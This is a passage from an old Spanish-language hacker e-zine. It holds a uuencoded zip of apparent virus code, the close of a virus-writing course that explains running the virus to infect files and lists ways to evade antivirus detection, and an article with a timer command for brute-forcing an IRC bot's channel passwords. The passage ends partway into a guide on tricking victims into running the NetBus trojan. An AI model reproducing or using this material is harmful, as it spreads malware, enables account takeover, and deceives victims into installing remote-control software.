MP`%7'@4O]#0B(```B2$```D```!&24Q%0RY#3TU5>7E8$U?;_IDUD\G"!,*.
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
M['@VBL015`UEKZ?1T&[email protected][1RO,AZ=U3\\&L(%757\F"Z:6?;XC1+H^
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
M(8,3PLO6;I^,#)L-DOMS(T$&)*8Q'SW4`?&L@!Y`^[email protected]>K$Y
M(3,.Q9K"D;5X1S<NUEJ_Z:"C>8)^/44WY;F$(;-\0J0J<U"'V=?#W'ARCGB.
M\M>4L71"KJ=QB2XZR,'%$Z`4\2<W)&P#^NVH'ZT2W&N_-HE72BJ\Z'&Q=PUO
MF85OI)G^C`7S87PP]]:#SUW4;W[H(B9-*+61R#!G[<#0^;ASA):Q/M\;.6.&
MJYX?>6@!LUU<5%/O>6_:5]O4@NUZ*7W;;!WY+#7A16HSCWQLZK!W=,R(Z]"'
MCIX[VFWTQO`&N3D-1D.*7&4A(:6OD0FT`QG,E#F\M-C$NE%='72C]EEB3K(K
M-X/?&__$SY=GU[0?=]!"68')AA&)O?52"1/HD,]V"(RE4>VF=B*VIWP\W0,U
M]1J<EJ235Y$.\XF_S*PO2='#"\VSX-`K(>X`U+PRKX63S*[T3_0#9N2V7GBG
MGMY6^'$`1>_53Z!0M2J2=LJ@-\)79F"F1XN&B%+$J#Q#@-A+.F&Y)(HPLP2S
MR7)$L;^'%2TURDL<+#Z-J7M_;\8L(TCG@C^_NK4>Q>O"T>UH?7CX2&+VW:,P
M1W\6;D[8%6[?,J(Z`O"C$43^$7Q877M^T\U/Z>C)&R"E1G/2F)"F1$@/G<0_
M44D[CE9*.HM[5QI?5A;#V=?48.329P\=U,VDG^!^;KR<C-?8P?WRIBW_W?1J
MTQTS;#V2S'B"<IY.S3AOL/#>72!0RQ$TCF]@@MD_CCKKDYI(K`!*KGXH>=?K
M"L#AC#"YW@F5Q\TT\(QQ<@-FA"6"_@Y;PYUBY%+X%CYZU+<V/!FY!Y&&9Z&L
M[D_ZL=D]O->H%[email protected]\'+W7X^N'0_H^/5`%C:$?T@^Y8]+H>O1=0\(^*35)
MV1"U+U;)!=<9.UT`?,09IR:YI_#P+Q6`#^49=!^JH56RY-!0F0I?M?ICW1(`
M1D3QO_7R"%G2*MWR>2L7:,&(9*Y?GIVRI&S)@A*95%&BT[F+R,0/5_*TVA7S
MELM6.RW2S5N!:1V>*Y:LG*=?LFIEC-X7>$//PY^'(Q*%5I.1E;IQZ@?:Q%S%
M?J)L;+A),3^$'I_RT>R5)1\NDFG7PROGS5^R=^5"V9`L57TH-W=J;HQ,8]%_
M`V=NGJ>SKBC1!Y7F;QIU"Y(EZN8O;E*V,2?.-2E6SM\7,&^!`.P8'50Z&@1%
M1*_Q#R1YD6OP^8`L,2QOW%YJ,UPNG[\\MQ@/A]SF[LG*GIJ7&#->UFA-?K[/
M9X6U5+9K]MKEUK,R:-K7_I",!T'JX54H!$.2&9.E$,J'5JR3>4`C8O;5W;XR
M4`9]P$O]&B;X,)`&AW6^0<E'EY9#T=0KD'[T#96\[JO=*8_64$G?E+R#%E(0
M9YA%E6%4-49]=LN`40<PZB1&S;K5A5$W,>I/PQF,ZL<H7(52;D=8C`K&J&@L
M)IW28%2!"I+!\)4,U`I;.1<(J-%L]8BP2^5]H`7A@3NJ(0&$[YS^2)*7@ZX7
MN\#PWR)[S#BI*^;"N6$2&"G`1I5@^&(G+B#`Z;-V<@P7CSG!'\<(H`"!%J.`
M8J5A^?*0@XGSI%)HQD5L-BQ`4"D?@T;E2P'DY.YD'#1`/*F;BPCX2C&*=()&
MY#=<ZDS^1R#F2:1"()L`H#O<_P!02P$"%``4``(`"``/AN$@]3K'G2H```"E
M!0``"``````````!`"``````````0T%:02Y#3TU02P$"%``4``(`"`#``5<>
M!2_T-"(@``")(0``"0```````````"````!0````1DE,14,N0T]-4$L%!@``
2```"``(`;0```)D@````````
`
end
=== UUENCODE end 'utils.zip' ===

Hacer lo siguiente. Copi is el archivo 'caza.com' a 'caza2.com' de modo
que teng is dos copias idénticas. A continuación ejecut is el virus en
ese mismo directorio UNA SOLA VEZ (que si no infectar  ambas copias). Y
luego ejecut is 'filec caza.com caza2.com' y podréis ver cómo ha
cambiado el host. Si acontinuacón ejecut is 'caza.com' y volvéis a
comparar ambas copias veréis que ahora son idénticas, el virus se ha
reproducido y las copias también se reproducen.

Cosas que quedan por hacer con este virus:

i) Tal y como est  ser  muy difícil de mejorar, dado que los saltos
condicionales que usa est n al límite de su distancia }:)))), así que el
que quiera seguir trabajando con él tendra que meter toda la infección
en un procedimiento y dejar el cuerpo del virus aparte.

ii) El virus no infecta archivos protegidos contra escritura. Debería
cambiarse los atributos del archivo a infectar y restaurarlos después.

iii) El virus es demasiado evidente. Salvo el SCAN (X"DDDDDDDDD) todos
los antivirus que he probado lo detectan. El TBAV salta unos pocos
flags, aunque son todos muy f ciles de evitar. Adem s falta un adecuado
tratamiento de la int 24h, para evitar problemas con discos protegidos.

iv) El virus no saltar  nunca de directorio, a menos que se meta en un
directorio del PATH, pudiendo entonces extenderse por todo el HD.

v) Cualquier antivirus residente lo parar .

Todas estas cosas las iremos evitando conforme mejoremos el virus. Allí
donde consigamos ir un paso por delante de los antivirus mejoraremos los
antivirus existentes, ya que es ese el motivo del curso actual. De
momento podemos tirar el SCAN a la basura y confiar en los dem s para
controlar este virus.

Bueno pues por hoy ya es bastante... creo que no he metido la pata en
nada de lo aquí expuesto pero si alguno ve fallos que por favor los
comente (la verdad es que es f cil que haya metido la gamba en algo :??)

Dudas todas las que quer is como ya os dije este es un paso importante
en el curso y el esqueleto aquí expuesto lo usaremos de ahora en
adelante para añadirle muchas mejoras ;)

Patuel.
[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
                       %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
                       %%$$$$$$$$$$$$$$$$$$$$$$$$$$%%
                       %%    Hacking a Scytale     %%
                       %%$$$$$$$$$$$$$$$$$$$$$$$$$$%%
                       %%        by []KHAN[]       %%
                       %%$$$$$$$$$$$$$$$$$$$$$$$$$$%%
                       %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

       Lo primero de todo una corta introduccion, Scytale es el bot que
"controla" el IRC Hispano, y como no, el cabron que se guarda en una base de
datos todas las contrase±as para tener OP en el canal que quieras. Si no
sabeis lo que OP o alguna de estas cosas, yo no lo voy a explicar aqui, para
esto partimos de que teneis unos conocimientos medios de IRC, si no, mirad
primero la RareGaZz 9 (GuyBrush), la 11 (lobo) o la 13 (CyberDan) donde se
explica basicamente lo que es el IRC...

       La forma de hackear al scytale es sencilla pero lenta, que yo sepa
no hay manear de bajar la base de datos del bot, solo un ataque bruto, aunque
como todo, seguro que se puede, si entras como root por telnet y sabes que
ficherito es, pues lo bajas, pero aun no se como se llama :( asi que explicare como hacer un ataque de fuerza bruta, se trata de hacer un programa en cualquier lenguaje de programacion (en el mIRC es muy facil) que pruebe contrase±as de un diccionario dando nombre de canal y nombre de usuario, pero CUIDADO! ahora controlan tambien que mascara tienes, es decir, hay varias mascaras: No pasa nada con ninguno menos con *!*@*.server.ext entonces nosotros tendremos que tener su mismo server, si no, no podremos, con los otros tipos de mascara es facil, te pones su nick, su host... :).... Estoy haciendo un addon para mIRC que va a hacer justamente eso, si eres creativo y te gusta la "programacion" podrias intentar hacer el tuyo propio, no es mas que un programa que lea de un diccionario una clave, y luego la guarde en una variable (ej. %pass), en otra variable el canal (%canal) y en otra el nick del lamer (%nick) y no tienes mas que hacer que un: " /timer1 0 3 /msg scytale auth %canal %nick %pass " y a cada intento
que lea una clave nueva, tambien quedaria guapo que controle cuando scytale te da OP en el canal %canal y entonces mostrar por pantalla la clave correcta y un /timer1 off para que no siga intentandolo... TEN CUIDADO, EN EL IRC HISPANO COMO EN CASI
TODOS HAY FLOOD, YA SABES, MAS DE X LINEAS EN X SEGUNDOS Y TE VAS A LA CALLE

()------------()  /\/\/\/\/\/\/\/\/\/\/\/\
<--> []KHAN[] <--> | [email protected] |
()------------()  \/\/\/\/\/\/\/\/\/\/\/\/

[[[[[[[[[[[[[[[[[ZeD-wOrLd-EzInE numero 4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]

-----------------------------------------------------------------------------
_/_/_/_/_/ _/_/_/_/_/ _/_/_/_/_/ _/      _/ _/       _/ _/_/_/_/_/ _/_/_/_/_/
   _/     _/      _/ _/      _/  _/    _/  _/_/     _/ _/      _/ _/
   _/     _/      _/ _/      _/   _/  _/   _/ _/    _/ _/      _/ _/
   _/     _/_/_/_/_/ _/      _/    _/_/    _/  _/   _/ _/      _/ _/_/_/_/_/
   _/     _/_/       _/      _/     _/     _/   _/  _/ _/      _/         _/
   _/     _/  _/     _/      _/    _/      _/    _/ _/ _/      _/         _/
   _/     _/    _/   _/      _/   _/       _/     _/_/ _/      _/         _/
   _/     _/      _/ _/_/_/_/_/  _/        _/       _/ _/_/_/_/_/ _/_/_/_/_/
-----------------------------------------------------------------------------
       _/                _/ _/_/_/_/         _/_/_/_/_/_/_/_/
        _/              _/  _/_/_/_/         _/            _/
         _/            _/  _/_/ _/_/         _/            _/
          _ /         _/        _/_/         _/            _/
           _/        _/         _/_/         _/            _/
            _/      _/          _/_/         _/            _/
             _/    _/           _/_/         _/            _/
              _/  _/            _/_/         _/            _/
               _/_/    _/_/     _/_/    _/_/ _/            _/
                _/     _/_/   _/_/_/_/  _/_/ _/_/_/_/_/_/_/_


                               %%%%%%%%%%%%%%%
                               %% hecho por %%
                               %%$$$$$$$$$$$%%
                               %% []KHAN[]  %%
                               %%%%%%%%%%%%%%%

-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
       Aqui hablare solo del "NetBus", el troyano mas mejor que hay:


       No creo que haga falta explicar lo que es un troyano, supongo que
todo el mundo sabra que es un programa que se instala (oculto) en el ordenata
de la victima y hace de servidor, mientras que otro usando el cliente puede
controlar remotamente el PC del que esta haciendo de server. Pues bien,
primero hablare del netbus, que para mi, es el mejor de todos...

       En este caso, el fichero que infecta se llama por defecto "Patch.exe"
y ocupa "472.576 bytes" (472Kb) lo cual es un peque±o inconveniente a la hora
de mandarselo a nuestra victima, ya que tendria que, ademas de tragarse la
excusa de que es cualquier otra cosa, bajar los 472Kb, que con las conexiones
que nos ofrece timofonica es algo que puede llegar a ser dificil ;-).  Una
vez que que lo ejecute el programa aparentemente no hace nada, aunque
internamente acaba de infectar el ordenador y sacarse una copia a si mismo
en el directorio \windows\ (o donde tengais el ventanukos).  Es el momento
de soltarle una excusa patatera para que no le de importancia, entonces
